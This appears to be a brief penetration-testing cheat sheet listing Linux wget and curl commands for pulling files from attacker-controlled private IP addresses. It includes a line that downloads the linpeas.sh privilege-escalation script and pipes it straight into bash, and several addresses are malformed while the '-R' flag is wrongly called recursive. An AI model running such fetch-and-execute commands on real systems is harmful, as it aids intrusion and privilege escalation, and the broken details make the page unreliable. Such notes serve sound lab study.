Linux

wget

wget http://192.168.119.123:443/whtever

Recursive
wget -R 192.168.110.123 

curl

curl http://192.168.119./linpeas.sh | bash
curl -O http://1010.10/lol.txt

Last updated